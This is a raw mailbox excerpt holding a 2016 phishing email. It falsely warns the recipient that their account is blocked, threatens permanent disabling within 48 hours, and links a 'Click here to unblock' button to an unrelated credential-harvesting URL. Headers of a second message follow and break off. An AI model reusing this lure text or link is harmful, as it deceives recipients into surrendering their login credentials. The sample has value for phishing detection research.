From: "Account Update" <admin@socialbenessere.it>
Date: Mon, 03 Oct 2016 10:57:14 +0700
Status: O
X-Status: 
X-Keywords:                  
X-UID: 377

You will not see this in a MIME-aware mail reader.
--===============0906257698==
Content-Type: text/plain; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

     Dear User jose@monkey.org =

 =

 We noticed that your email account has been outdated . Your jose@monkey.or=
g account has been placed on temporary block, it would be permanently block=
ed if you do not unblock within 48hours.
  =

 Click here to unblock your account  =

  =

  =

 Note:
 =

 Failure to unblock your e-mail account. It will be permanently disabled.
 =

 Thank you for using our service.
    =20
--===============0906257698==
Content-Type: text/html; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<html>
<head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Dutf=
-8"/>
	<title></title>
</head>
<body>
<div class=3D"body undoreset" id=3D"yui_3_16_0_ym19_1_1472934998182_6346" s=
tyle=3D"-webkit-padding-start: 0px; outline: none 0px; display: table; widt=
h: 577px; box-sizing: border-box; background-color: rgb(255, 255, 255); pad=
ding-top: 12px; padding-left: 0px; color: rgb(0, 0, 0); font-family: &quot;=
Helvetica Neue&quot;, &quot;Segoe UI&quot;, Helvetica, Arial, &quot;Lucida =
Grande&quot;, sans-serif; font-size: 13px; font-style: normal; font-variant=
-ligatures: normal; font-variant-caps: normal; font-weight: normal; letter-=
spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-tran=
sform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-tex=
t-stroke-width: 0px;" tabindex=3D"0">
<div class=3D"email-wrapped" id=3D"yui_3_16_0_ym19_1_1472934998182_6345" st=
yle=3D"-webkit-padding-start: 0px; display: table-cell; width: auto; word-w=
rap: break-word; word-break: break-word;">
<div id=3D"yiv1246424180" style=3D"-webkit-padding-start: 0px;">
<div id=3D"yui_3_16_0_ym19_1_1472934998182_6344" style=3D"-webkit-padding-s=
tart: 0px;">
<p id=3D"yiv1246424180yui_3_16_0_ym19_1_1470870699515_27119" style=3D"-webk=
it-padding-start: 0px; margin: 0px; padding: 0px; display: block; color: rg=
b(0, 0, 0); font-size: 13px; font-style: normal; font-weight: normal; lette=
r-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-=
transform: none; white-space: normal; widows: 2; word-spacing: 0px; backgro=
und-color: rgb(255, 255, 255);">Dear User<span style=3D"-webkit-padding-sta=
rt: 0px;"> </span><b id=3D"yiv1246424180yui_3_16_0_ym19_1_1470870699515_271=
37" style=3D"-webkit-padding-start: 0px; font-size: 16px; font-family: cali=
bri; white-space: normal; word-spacing: 0px; text-transform: none; color: r=
gb(0, 0, 0); font-style: normal; letter-spacing: normal; line-height: norma=
l; text-indent: 0px; background-color: rgb(255, 255, 255);"><a href=3D"mail=
to:jose@monkey.org" id=3D"yiv1246424180yui_3_16_0_ym19_1_1470870699515_2713=
6" rel=3D"nofollow" style=3D"-webkit-padding-start: 0px; margin: 0px; paddi=
ng: 0px; text-decoration: underline; background: transparent; color: rgb(17=
, 85, 204); outline: none;" target=3D"_blank">jose@monkey.org</a></b><span =
style=3D"-webkit-padding-start: 0px; white-space: normal; word-spacing: 0px=
; text-transform: none; float: none; color: rgb(0, 0, 0); font-style: norma=
l; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: =
normal; font-stretch: normal; font-size: 16px; line-height: normal; font-fa=
mily: calibri; display: inline; letter-spacing: normal; text-indent: 0px; b=
ackground-color: rgb(255, 255, 255);"><span style=3D"-webkit-padding-start:=
 0px;"> </span></span><br style=3D"-webkit-padding-start: 0px; white-space:=
 normal; word-spacing: 0px; text-transform: none; color: rgb(0, 0, 0); font=
-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; =
font-weight: normal; font-stretch: normal; font-size: 16px; line-height: no=
rmal; font-family: calibri; letter-spacing: normal; text-indent: 0px; backg=
round-color: rgb(255, 255, 255);" />
<br style=3D"-webkit-padding-start: 0px; white-space: normal; word-spacing:=
 0px; text-transform: none; color: rgb(0, 0, 0); font-style: normal; font-v=
ariant-ligatures: normal; font-variant-caps: normal; font-weight: normal; f=
ont-stretch: normal; font-size: 16px; line-height: normal; font-family: cal=
ibri; letter-spacing: normal; text-indent: 0px; background-color: rgb(255, =
255, 255);" />
<span id=3D"yiv1246424180result_box" lang=3D"en" style=3D"-webkit-padding-s=
tart: 0px;"><span id=3D"yui_3_16_0_ym19_1_1472934998182_6364" style=3D"-web=
kit-padding-start: 0px;">We noticed that</span> <span style=3D"-webkit-padd=
ing-start: 0px;">your email account</span> <span style=3D"-webkit-padding-s=
tart: 0px;">has been outdated&nbsp;</span><span style=3D"-webkit-padding-st=
art: 0px;">.</span> <span id=3D"yui_3_16_0_ym19_1_1472934998182_6343" style=
=3D"-webkit-padding-start: 0px;">Your jose@monkey.org account has been plac=
ed on temporary block,</span></span>&nbsp;it would be permanently blocked i=
f you do not unblock within 48hours.</p>

<p id=3D"yui_3_16_0_ym19_1_1472934998182_6347" style=3D"-webkit-padding-sta=
rt: 0px; margin: 0px; padding: 0px; display: block; color: rgb(0, 0, 0); fo=
nt-size: 13px; font-style: normal; font-weight: normal; letter-spacing: nor=
mal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: non=
e; white-space: normal; widows: 2; word-spacing: 0px; background-color: rgb=
(255, 255, 255);">&nbsp;</p>

<center id=3D"yiv1246424180yui_3_16_0_ym19_1_1470870699515_27135" style=3D"=
-webkit-padding-start: 0px; display: block; text-align: center; color: rgb(=
0, 0, 0); font-style: normal; font-variant-ligatures: normal; font-variant-=
caps: normal; font-weight: normal; letter-spacing: normal; line-height: nor=
mal; orphans: 2; text-indent: 0px; text-transform: none; white-space: norma=
l; widows: 2; word-spacing: 0px; font-stretch: normal; font-size: 16px; fon=
t-family: calibri; background-color: rgb(255, 255, 255);"><a href=3D"http:/=
/assemany.com/site/saver/fs/auth/aut.php?email=3Djose@monkey.org" id=3D"yiv=
1246424180yui_3_16_0_ym19_1_1470870699515_27134" rel=3D"nofollow" style=3D"=
-webkit-padding-start: 0px; margin: 2px; padding: 8px; text-decoration: non=
e; background: rgb(1, 116, 223); color: rgb(255, 255, 255); outline: none; =
font-size: 12px; float: left; display: block;" target=3D"_blank">Click here=
 to unblock your account</a></center>

<p id=3D"yiv1246424180yui_3_16_0_ym19_1_1470870699515_27123" style=3D"-webk=
it-padding-start: 0px; margin: 0px; padding: 0px; display: block; color: rg=
b(0, 0, 0); font-size: 13px; font-style: normal; font-weight: normal; lette=
r-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-=
transform: none; white-space: normal; widows: 2; word-spacing: 0px; backgro=
und-color: rgb(255, 255, 255);">&nbsp;</p>

<p id=3D"yui_3_16_0_ym19_1_1472934998182_6348" style=3D"-webkit-padding-sta=
rt: 0px; margin: 0px; padding: 0px; display: block; color: rgb(0, 0, 0); fo=
nt-size: 13px; font-style: normal; font-weight: normal; letter-spacing: nor=
mal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: non=
e; white-space: normal; widows: 2; word-spacing: 0px; background-color: rgb=
(255, 255, 255);">&nbsp;</p>

<p id=3D"yui_3_16_0_ym19_1_1472934998182_6349" style=3D"-webkit-padding-sta=
rt: 0px; margin: 0px; padding: 0px; display: block; color: rgb(0, 0, 0); fo=
nt-size: 13px; font-style: normal; font-weight: normal; letter-spacing: nor=
mal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: non=
e; white-space: normal; widows: 2; word-spacing: 0px; background-color: rgb=
(255, 255, 255);">&nbsp;</p>

<p id=3D"yiv1246424180yui_3_16_0_ym19_1_1470870699515_27125" style=3D"-webk=
it-padding-start: 0px; margin: 0px; padding: 0px; display: block; color: rg=
b(0, 0, 0); font-size: 13px; font-style: normal; font-weight: normal; lette=
r-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-=
transform: none; white-space: normal; widows: 2; word-spacing: 0px; backgro=
und-color: rgb(255, 255, 255);"><span id=3D"yiv1246424180result_box" lang=
=3D"en" style=3D"-webkit-padding-start: 0px;"><span style=3D"-webkit-paddin=
g-start: 0px;">Note:</span><br style=3D"-webkit-padding-start: 0px;" />
<br style=3D"-webkit-padding-start: 0px;" />
<span style=3D"-webkit-padding-start: 0px;">Failure to un</span>block <span=
 style=3D"-webkit-padding-start: 0px;">your</span> <span id=3D"yui_3_16_0_y=
m19_1_1472934998182_6362" style=3D"-webkit-padding-start: 0px;">e-mail</spa=
n> <span style=3D"-webkit-padding-start: 0px;">account</span><span style=3D=
"-webkit-padding-start: 0px;">.</span> <span id=3D"yui_3_16_0_ym19_1_147293=
4998182_6353" style=3D"-webkit-padding-start: 0px;">It will</span> <span st=
yle=3D"-webkit-padding-start: 0px;">be permanently disabled</span><span sty=
le=3D"-webkit-padding-start: 0px;">.</span><br style=3D"-webkit-padding-sta=
rt: 0px;" />
<br style=3D"-webkit-padding-start: 0px;" />
<span style=3D"-webkit-padding-start: 0px;">Thank you for using our</span> =
<span style=3D"-webkit-padding-start: 0px;">service</span><span style=3D"-w=
ebkit-padding-start: 0px;">.</span></span></p>
</div>
</div>
</div>
</div>
</body>
</html>

--===============0906257698==--

From jose@monkey.org Mon Oct  3 06:31:00 2016 +0000
Return-Path: linda.kohler@mohican.com
Delivered-To: jose@monkey.org
X-FDA: 72027964680.04.neck59_25dbaa43ce10e
X-Spam-Summary: 75,0,0,ad57931f510231de,d41d8cd98f00b204,linda.kohler@mohican.com,:info@mail.com,RULES_HIT:10:41:72:355:379:474:582:960:962:967:973:978:983:988:989:1152:1158:1189:1208:1221:1256:1260:1263:1313:1314:1345:1381:1431:1436:1437:1516:1517:1518:1533:1534:1541:1575:1588:1589:1592:1594:1711:1714:1730:1748:1777:1792:2525:2527:2561:2564:2610:2682:2685:2693:2859:2895:2905:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3867:3872:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4552:5007:6117:6261:6659:8583:8603:8957:9025:9082:9111:9411:9908:10004:10049:10346:10400:11656:11658:11914:12043:12519:12555:12657:12855:13019:13139:13163:13229:13237:13439:14096:14181:14659:14721:21080:21433:21451:30037:30054:30070:30075,0,RBL:173.84.32.19-irl.urbl.hostedemail.com-127.0.0.175,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fs,MSBL:0,DNSBL:neutral,Custom_rules:0:0:0,LFtime:66,LUA_SUMMARY:none
X-HE-Tag: neck59_25dbaa43ce10e
X-Filterd-Recvd-Size: 2610
Received: from admem2.corp.mohican.com (mail.mohican-nsn.gov [173.84.32.19])
	by imf20.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Mon,  3 Oct 2016 06:31:00 +0000 (UTC)
Received: from ADMEM2.CORP.MOHICAN.com ([fe80::f88d:fc65:56d5:3fd6]) by
 ADMEM2.CORP.MOHICAN.com ([fe80::f88d:fc65:56d5:3fd6%10]) with mapi id
 14.03.0174.001; Mon, 3 Oct 2016 01:30:58 -0500
